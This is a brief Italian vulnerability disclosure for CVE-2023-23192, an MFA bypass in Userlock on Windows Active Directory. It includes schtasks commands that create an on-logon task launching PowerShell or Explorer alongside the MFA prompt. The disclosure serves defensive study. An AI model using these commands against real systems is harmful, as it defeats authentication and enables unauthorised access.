
CVE-2023-23192
Descrizione: Userlock è una soluzione di Autenticazione Multi-Fattore per Ambienti Windows Active Directory e Cloud per fermare accessi non autorizzati e indesiderati. Consente un'autenticazione a due fattori (2FA) personalizzata su accesso Windows, Desktop remoto (RDP e RD Gateway), IIS, VPN e applicazioni cloud. Userlock permette di implementare MFA per gli accessi di Active Directory su workstation e server appartenenti al dominio. Alla prima connessione del giorno alla propria workstation, viene visualizzata una finestra di dialogo in cui inserire il codice OTP dall'app Authenticator. Userlock si integra con il processo di accesso per fornire autenticazione a due fattori.
Una delle strategie più comunemente sfruttate dagli attori delle minacce per stabilire persistenza sul computer di una vittima è la pianificazione delle attività. L'avversario utilizza spesso questa strategia per eludere il rilevamento automatico, mantenere la persistenza e condurre attacchi a sorpresa dopo lunghi periodi di inattività.
Vulnerabilità:
Creare un'attività pianificata che viene eseguita dopo l'accesso di qualsiasi utente.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

Dopo aver effettuato l'accesso con le credenziali di dominio, viene visualizzata una finestra cmd.exe pianificata insieme alla finestra di dialogo MFA di Userlock.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"